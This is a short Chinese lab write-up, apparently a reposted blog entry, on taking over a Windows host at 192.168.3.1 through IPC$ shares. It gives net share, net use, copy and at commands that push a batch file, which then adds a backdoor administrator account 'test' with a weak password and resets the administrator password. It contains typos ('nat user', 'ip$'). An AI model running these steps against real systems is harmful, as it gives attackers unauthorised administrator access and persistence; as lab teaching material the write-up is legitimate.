本文共 664 字,大约阅读时间需要 2 分钟。
1. 实验准备
1)查看目标主机是否打开共享:net share /增加共享:net share c$=c://删除共享:net share c$ /del
2)新建一个user.bat文件,文件中命令net user test 111111 /add net localgroup administrators test /add/作用,在目标主机上创建一个用户test,密码111111,将用户test增加到administrator组;
3)修改目标主机的administrator密码:nat user administrator 111111
2.实验阶段
1)建立连接:net use //192.168.3.1/ip$ 111111 /user:administrator
2)拷贝文件:copy user.bat //192.168.3.1/c$
3)查看目标机器的时间:net time //192.168.3.1
4)在目标机器上创建运行程序的任务:at //192.168.3.1 14:00 "c:/user.bat"
5)查看任务是否创建:at //192.168.3.1
3.验证阶段
1)通过远程桌面连接目标主机,192.168.3.1,登录过程中输入用户名和密码,查看是否可以登录,登录成功后查看是否是administrator权限;
2)在目标主机上运行net user 查看是否具有test用户,如果有,运行net user test,查看其权限是否属于本地用户组administrators
转载地址:http://qonli.baihongyu.com/